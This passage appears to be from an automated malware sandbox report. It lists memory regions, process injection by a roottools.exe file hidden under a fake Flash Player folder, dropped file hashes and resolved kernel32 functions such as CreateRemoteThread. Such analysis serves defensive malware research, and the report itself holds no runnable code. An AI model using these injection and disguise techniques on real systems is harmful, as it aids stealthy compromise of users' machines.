| windowsshell.manifest | 0x00170000 | 0x00170fff | Memory Mapped File | Readable |
|
|
|
|
| pagefile_0x0000000000170000 | 0x00170000 | 0x00170fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000180000 | 0x00180000 | 0x001bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000001c0000 | 0x001c0000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Pagefile Backed Memory | Readable |
|
|
|
|
| index.dat | 0x001e0000 | 0x001ebfff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x00000000001f0000 | 0x001f0000 | 0x0022ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000230000 | 0x00230000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
|
| index.dat | 0x00270000 | 0x00277fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| index.dat | 0x00280000 | 0x0028ffff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x0000000000290000 | 0x00290000 | 0x002bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000290000 | 0x00290000 | 0x00290fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000002e0000 | 0x002e0000 | 0x0031ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000300000 | 0x00300000 | 0x0033ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000350000 | 0x00350000 | 0x0038ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000390000 | 0x00390000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003a0000 | 0x003a0000 | 0x003dffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000003e0000 | 0x003e0000 | 0x0041ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000420000 | 0x00420000 | 0x0045ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000480000 | 0x00480000 | 0x004fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000510000 | 0x00510000 | 0x0054ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000550000 | 0x00550000 | 0x0058ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000005b0000 | 0x005b0000 | 0x006affff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x00837fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000840000 | 0x00840000 | 0x009c0fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000009d0000 | 0x009d0000 | 0x00dc2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000000dd0000 | 0x00dd0000 | 0x00f4ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000dd0000 | 0x00dd0000 | 0x00e0ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000e30000 | 0x00e30000 | 0x00e6ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000ed0000 | 0x00ed0000 | 0x00f4ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000f50000 | 0x00f50000 | 0x00f8ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000f90000 | 0x00f90000 | 0x00fcffff | Private Memory | Readable, Writable |
|
|
|
|
| svchost.exe | 0x00fe0000 | 0x00fe7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000ff0000 | 0x00ff0000 | 0x023effff | Pagefile Backed Memory | Readable |
|
|
|
|
| sortdefault.nls | 0x023f0000 | 0x026befff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000026d0000 | 0x026d0000 | 0x0270ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002730000 | 0x02730000 | 0x0276ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002770000 | 0x02770000 | 0x027affff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000027b0000 | 0x027b0000 | 0x027effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000027f0000 | 0x027f0000 | 0x0282ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002830000 | 0x02830000 | 0x0286ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002880000 | 0x02880000 | 0x028bffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000028e0000 | 0x028e0000 | 0x0291ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002930000 | 0x02930000 | 0x0296ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002990000 | 0x02990000 | 0x029cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000029d0000 | 0x029d0000 | 0x02beffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000029d0000 | 0x029d0000 | 0x02acffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002a10000 | 0x02a10000 | 0x02a4ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002a90000 | 0x02a90000 | 0x02acffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002bb0000 | 0x02bb0000 | 0x02beffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002bf0000 | 0x02bf0000 | 0x02ceffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002cf0000 | 0x02cf0000 | 0x02e4ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002cf0000 | 0x02cf0000 | 0x02e2ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002d80000 | 0x02d80000 | 0x02dbffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002e40000 | 0x02e40000 | 0x02e4ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002e50000 | 0x02e50000 | 0x0301ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002e50000 | 0x02e50000 | 0x02e8ffff | Private Memory | Readable, Writable |
|
|
|
|
| comctl32.dll | 0x73b20000 | 0x73cbdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrtremote.dll | 0x745c0000 | 0x745cdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| netprofm.dll | 0x745d0000 | 0x74629fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rasadhlp.dll | 0x74630000 | 0x74635fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x746f0000 | 0x746f7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x74700000 | 0x7475bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74760000 | 0x7479efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nlaapi.dll | 0x747a0000 | 0x747affff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sensapi.dll | 0x747b0000 | 0x747b5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rasman.dll | 0x747c0000 | 0x747d4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rasapi32.dll | 0x747e0000 | 0x74831fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| schannel.dll | 0x74840000 | 0x74879fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x74880000 | 0x748bafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x748c0000 | 0x748d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rtutils.dll | 0x748f0000 | 0x748fcfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| userenv.dll | 0x74900000 | 0x74916fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winnsi.dll | 0x74920000 | 0x74926fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iphlpapi.dll | 0x74930000 | 0x7494bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dnsapi.dll | 0x74950000 | 0x74993fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| profapi.dll | 0x74cb0000 | 0x74cbafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x74dc0000 | 0x74dcbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x74dd0000 | 0x74e2ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x74e30000 | 0x74e8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x74e90000 | 0x74ea8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| psapi.dll | 0x74eb0000 | 0x74eb4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iertutil.dll | 0x74ec0000 | 0x750bafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msasn1.dll | 0x750c0000 | 0x750cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x750d0000 | 0x75126fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x75130000 | 0x751bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75250000 | 0x75295fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x752a0000 | 0x7534bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wininet.dll | 0x75350000 | 0x75444fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x75450000 | 0x755abfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x755b0000 | 0x7564cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| clbcatq.dll | 0x75650000 | 0x756d2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x756e0000 | 0x7577ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x75780000 | 0x75789fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x75790000 | 0x7588ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x75890000 | 0x758c4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| crypt32.dll | 0x758d0000 | 0x759ecfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x759f0000 | 0x75afffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x75b00000 | 0x75bcbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shell32.dll | 0x75c50000 | 0x76899fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x76b60000 | 0x76beefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wintrust.dll | 0x76bf0000 | 0x76c1cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| urlmon.dll | 0x76c40000 | 0x76d75fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76d80000 | 0x76e6ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000076e70000 | 0x76e70000 | 0x76f69fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000076f70000 | 0x76f70000 | 0x7708efff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77090000 | 0x77238fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x77240000 | 0x77245fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77270000 | 0x773effff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x000000007ef92000 | 0x7ef92000 | 0x7ef94fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ef95000 | 0x7ef95000 | 0x7ef97fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ef98000 | 0x7ef98000 | 0x7ef9afff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ef9b000 | 0x7ef9b000 | 0x7ef9dfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007ef9e000 | 0x7ef9e000 | 0x7efa0fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
|
For performance reasons, the remaining 44 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
| Injection Type | Source Process | Source Os Thread ID | Injection Info | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x97c | address = 0xb0000, size = 114688 |
|
1 | |
| Modify Memory | #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x97c | address = 0xc76c4, size = 4 |
|
1 | |
| Modify Memory | #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x97c | address = 0xc77d0, size = 4 |
|
1 | |
| Modify Memory | #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x97c | address = 0xc7d38, size = 4 |
|
1 | |
| Create Remote Thread | #7: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe | 0x97c | address = 0xb95bc |
|
1 |
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\temp\cab4336.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar4337.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\cab43c5.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar43c6.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\cab5979.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar597a.tmp | 0.00 KB (0 bytes) |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\cab4336.tmp | 52.71 KB (53978 bytes) |
MD5:
03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311 |
|
|
| c:\users\aetadzjz\appdata\local\temp\cab43c5.tmp | 52.71 KB (53978 bytes) |
MD5:
03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311 |
|
|
| c:\users\aetadzjz\appdata\local\temp\cab5979.tmp | 52.71 KB (53978 bytes) |
MD5:
03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311 |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar4337.tmp | 126.77 KB (129813 bytes) |
MD5:
4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0 SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2 |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar43c6.tmp | 126.77 KB (129813 bytes) |
MD5:
4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0 SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2 |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar597a.tmp | 126.77 KB (129813 bytes) |
MD5:
4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0 SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\sgw[1].txt | 5.65 KB (5784 bytes) |
MD5:
9d4f7d11a38b13abfffb23c26855ef96
SHA1: a439414520213ebc9e009ef0280efbc4c442506c SHA256: e73f65e4321a8a5af6a80097a853cd49fd7a3eedd72bfdee47a3eab0a0015663 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\dw[1].txt | 3.15 KB (3224 bytes) |
MD5:
aa11e7edd31a5aa3003171b3ce6a1e63
SHA1: 19f920fe20fb0368145fe224cbb6bc93c1c5db86 SHA256: c39527e8fc3c7154327298c32145bc51f21ab57c71297a374b89d95b46500b89 |
|
|
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 | 0.33 KB (342 bytes) |
MD5:
cd4e3ab8068c33a6b3aec816fe51f106
SHA1: 71c4541a08b266e8e0ba9c0c7f91742e9b5a3511 SHA256: 8740ce6d272bdc6b54ae4c2e5e4aaf9ab3d2272be470d388ba276d79c51febe2 |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\history\history.ie5\index.dat | 64.00 KB (65536 bytes) |
MD5:
ee5b2511cdb5b31e4749e5955ca9a85a
SHA1: 315d35255f49ceb0f944a7b847a67ec7f9ef15b5 SHA256: 87b654ae60929fec10edbdc471e9afebfac63a157ea6fceaeb4a6445690b26af |
|
|
| c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 | 0.33 KB (342 bytes) |
MD5:
affe9cecdbfde660607fec2b5edaaa6f
SHA1: 4ef3b8e735708851cc283c0b6e3cfa2f5f46cd1e SHA256: 08acb6e6b710a96bc80c48695117802596b7aaabae08f4db40cc37eacd7299de |
|
|
| c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat | 48.00 KB (49152 bytes) |
MD5:
9f1ab0535bfe55d2abb1f6e6adf846bd
SHA1: 50f06d017905b347a5155f877fcf966db327dd40 SHA256: 7978882c50b68ce6e541aa765a7a98907cc56c4f1dd794a92766b2f23df85c73 |
|
|
| c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\index.dat | 32.00 KB (32768 bytes) |
MD5:
50d06047bd7adf336c6a8dd390506ff3
SHA1: ba8e1f4ec8f6aa576cf4f9b2a48587bec03b9582 SHA256: c657149342b5c59c25e0b42daeade7362989c99571979f788342e6bae0c8048e |
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x75a07a2f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x75a049d7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x75a089b3 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x772b1f6e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x75a110b5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x75a034d5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x7729e026 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x75a035b7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x75a1d9b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x75a02d3c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x772a45f5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x75a0dd0e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x75a014e9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x75a05a7e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x75a2d4c4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x75a0103d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x75a0170d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x75a01400 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x75a05a96 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x75a1d9c8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x75a2d075 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x75a1d5cd |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x75a05151 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x75a1ce2e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x75a017ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x75a0469b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x772e5f41 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x75a01809 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x75a01b00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x75a01ae5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x75a01886 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x75a01245 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x772e742b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x75a07a10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x75a011f8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x75a2830d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x75a03e8e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x75a0195e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x75a1d851 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x75a25c1e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x75a2c7ea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a8416b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a8414b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a841df |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a840fb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x75a05371 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x75a0418b |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x75a044ab |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x75a23b92 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x75a01b48 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x75a017d1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x772a2c42 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x75a0465a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x75a0192e |
|
1 | |
